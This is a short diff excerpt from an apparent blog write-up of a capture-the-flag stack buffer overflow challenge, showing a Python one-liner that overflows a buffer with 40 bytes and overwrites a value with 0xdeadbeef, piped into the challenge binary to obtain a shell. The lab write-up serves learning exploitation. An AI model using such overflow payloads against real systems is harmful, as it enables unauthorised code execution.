Reboare/Lagrange/_posts/2017-12-26-linux-stack-bof-1.md

 ```python
 import struct;  print "A"*40 + struct.pack("<L", 0xdeadbeef)
 ```
 We run this and pipe it into our binary, and while we get a shell it isn't returned to us as interactive.
-(There was ways around this).
+(There was ways around this, I think).
 ```bash
 app-systeme-ch13@challenge02:~$ python -c 'import struct;  print "A"*40 + struct.pack("<L", 0xdeadbeef);' | ./ch13